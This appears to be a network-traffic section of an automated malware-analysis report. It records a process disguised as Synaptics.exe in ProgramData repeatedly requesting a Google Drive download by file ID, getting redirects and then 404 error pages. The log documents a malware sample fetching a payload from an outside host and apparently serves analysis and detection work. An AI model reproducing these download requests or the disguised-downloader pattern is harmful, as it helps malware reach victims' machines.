                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-MEmNMVEUY5iPlAOwG-Nf8A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                40192.168.2.449873142.250.181.144434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:20:59 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-24 17:21:00 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:00 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-BJABPBBjZmWglCiloDIaeg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                41192.168.2.449874142.250.181.974434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:20:59 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                                                                                                                2024-12-24 17:21:00 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                X-GUploader-UploadID: AFiumC6BkFi626pl81t_2QH3VOK9OZNC4R7lAWHNndeIJ2NWQbcFzoSSnZmuj0CGQTFLMZ27
                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:00 GMT
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-CKPjYxlYA21zmfc6vXULsQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Length: 1652
                                                                                                                                Server: UploadServer
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                                Connection: close
                                                                                                                                2024-12-24 17:21:00 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                2024-12-24 17:21:00 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 75 69 4d 66 6b 54 6e 43 44 68 75 66 6e 66 59 6e 45 30 6b 46 62 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                Data Ascii: t Found)!!1</title><style nonce="uiMfkTnCDhufnfYnE0kFbw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                2024-12-24 17:21:00 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                42192.168.2.449876142.250.181.144434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:20:59 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-24 17:21:00 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:00 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-RSSNMDRwgmvkEDDK2ks6hg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                43192.168.2.449875142.250.181.974434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:20:59 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                                                                                                                2024-12-24 17:21:00 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                X-GUploader-UploadID: AFiumC7YzwNMq3rj4hf3wLmxz7m6FAHsvCig-bZMagAbBLaEGV1RwjwOkJEoSAzZMpKi5hVy
                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:00 GMT
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-uiHlfDNfzY20xe66xrKXGw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Content-Length: 1652
                                                                                                                                Server: UploadServer
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                                Connection: close
                                                                                                                                2024-12-24 17:21:00 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                2024-12-24 17:21:00 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6f 76 71 38 76 6e 5f 6d 5f 6e 70 73 6c 53 71 64 38 35 39 58 42 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                Data Ascii: t Found)!!1</title><style nonce="ovq8vn_m_npslSqd859XBQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                2024-12-24 17:21:00 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                44192.168.2.449889142.250.181.144434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:21:02 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-24 17:21:03 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:03 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-MyO5P1CDwWMWttbdfAmVMA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                45192.168.2.449890142.250.181.144434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:21:02 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-24 17:21:03 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:03 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-AVJ1QWZ7vvdDz1oq8VlIkg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                46192.168.2.449897142.250.181.144434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:21:05 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Cookie: NID=520=qh-ukOUmpKIDdd1kgysVqyDq4zWsJ3HmMeD46WA0aLR-4CYLV_2_v68_hqe_miGaxKY1bijQI_MR8_5g85RzwpdTn5SeN-ED-kuHC-65e4kwQ3LCdHoRfa9--p6JzsbuU2Mu4UYOgCEH1x6aeybzksX3kbew952WrBqFseVauF_lXWFZTMTi7f7c
                                                                                                                                2024-12-24 17:21:06 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:06 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-fHSmO0lGQUlVvnF7J70CXg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                47192.168.2.449900142.250.181.144434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:21:05 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Cookie: NID=520=qh-ukOUmpKIDdd1kgysVqyDq4zWsJ3HmMeD46WA0aLR-4CYLV_2_v68_hqe_miGaxKY1bijQI_MR8_5g85RzwpdTn5SeN-ED-kuHC-65e4kwQ3LCdHoRfa9--p6JzsbuU2Mu4UYOgCEH1x6aeybzksX3kbew952WrBqFseVauF_lXWFZTMTi7f7c
                                                                                                                                2024-12-24 17:21:06 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:06 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-ItCwldOg2AxbjJrqlkiAJA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                48192.168.2.449898142.250.181.974434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:21:05 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                                                                                                                2024-12-24 17:21:06 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                X-GUploader-UploadID: AFiumC4u73FbZ8X4yjtHkxSNyApsI2hanK3wXd3ARba7e9P77czY0wSQKgZTZU1pIRHkjZDC
                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:06 GMT
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
